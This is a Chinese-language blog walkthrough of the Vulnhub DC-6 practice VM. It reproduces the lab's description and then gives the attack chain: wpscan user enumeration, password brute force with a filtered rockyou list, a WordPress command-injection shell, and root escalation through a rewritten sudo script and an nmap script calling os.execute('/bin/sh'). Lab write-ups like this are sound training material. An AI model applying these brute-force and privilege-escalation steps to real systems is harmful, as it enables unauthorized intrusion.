Vulnhub靶机DC系列-DC6
title: Vulnhub靶机DC系列-DC6
abbrlink: 331d7522
date: 2022-09-12 11:24:26
tags: Vulnhub
靶场简介
描述
DC-6 是另一个特意建造的易受攻击的实验室,旨在获得渗透测试领域的经验。
这不是一个过于困难的挑战,因此对初学者来说应该很棒。
这一挑战的最终目标是获得根并阅读唯一的标志。
必须具备 Linux 技能和熟悉 Linux 命令行,以及一些基本渗透测试工具的经验。
对于初学者来说,谷歌可以提供很大的帮助,但你可以随时在@DCAU7 上给我发推文,寻求帮助,让你重新开始。但请注意:我不会给你答案,相反,我会给你一个关于如何前进的想法。
技术信息
DC-6 是基于 Debian 64 位构建的 VirtualBox VM,但在大多数 PC 上运行它应该没有任何问题。
我已经在 VMWare Player 上对此进行了测试,但如果在 VMware 中运行此 VM 有任何问题,请通读此内容。
它当前配置为桥接网络,但是,可以根据您的要求进行更改。网络配置为 DHCP。
安装很简单 - 下载它,解压缩,然后将它导入 VirtualBox 或 VMWare,然后就可以了。
注意:您需要在您的渗透测试设备上编辑您的主机文件,以便它读取如下内容:
192.168.0.142 wordy
注意:我以 192.168.0.142 为例。您需要使用常规方法来确定 VM 的 IP 地址,并进行相应调整。
这个非常重要。
是的,它是另一个基于 WordPress 的虚拟机(虽然只是我的第二个)。
重要的
虽然使用此 VM 应该没有问题,但通过下载它,您将对此 VM 可能造成的任何意外损坏承担全部责任。
这么说应该没什么问题,但我觉得有必要把它扔在那里以防万一。
接触
我也很想听听人们如何解决这些挑战,所以如果你准备写一个演练,请这样做并给我一个链接,或者,在 Twitter 上关注我,然后给我发消息(你可以如果您愿意,请在您给我 DM 后取消关注)。
可以通过 Twitter 联系我 - @DCAU7
线索
好吧,这并不是一个真正的线索,但对于那些只想继续工作的人来说,更多的是一些“我们不想花五年时间等待某个过程完成”的建议。
cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt 这应该可以为您节省几年时间。;-)
基本信息
kali 192.168.169.220
dc-6 192.168.169.232
根据描述修改 host
格式
192.168.169.232 wordy
kali linux
vim /etc/hosts
windows
C:\Windows\System32\drivers\etc
扫描目标ip
- ssh 和 http
- 访问
开扫
wpscan --url http://wordy/ -e
- 找到用户
-
把这些用户名 user.txt 保存
-
根据上面的线索,作者给出爆破的字典
cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt
- 在rockyou.txt中查找包含k01的字符串,并写入文件passwords.txt
爆破
wpscan --url http://wordy -U user.txt -P passwords.txt
Username: mark
Password: helpdesk01
- 登录后台
http://wordy/wp-login.php?
- 找到一个 输入框 可以执行命令,需要修改一下长度限制
- 搜索可以利用的漏洞
- 运行脚本 根据提示 填入相应的信息
- 交互式shell 直接停止运行 放弃
另一个脚本
- 修改文件
- 保存打开并且监听端口
- 监听成功
python -c 'import pty; pty.spawn("/bin/bash")'
提权
- 找到
graham
GSo7isUM1D4
ssh
- ssh 登陆成功
查看权限
-
graham用户可以修改/home/jens/backups.sh文件。
-
用echo命令改写/home/jens/backups.sh的内容
echo "/bin/bash" > backups.sh
- 用jens的身份执行,得到jens的shell
sudo -u jens /home/jens/backups.sh
- 查看jens可以sudo执行的命令,发现其可以以root的身份执行nmap命令
- 找可以利用的 (没成功)
- 另一种方法
nmap工具是可以执行脚本的,那么我们把弹root用户shell的命令写入到nmap的脚本里面,然后用nmap命令执行即可切换到root用户的shell。命令:
echo 'os.execute("/bin/sh")' > getShell
sudo nmap --script=getShell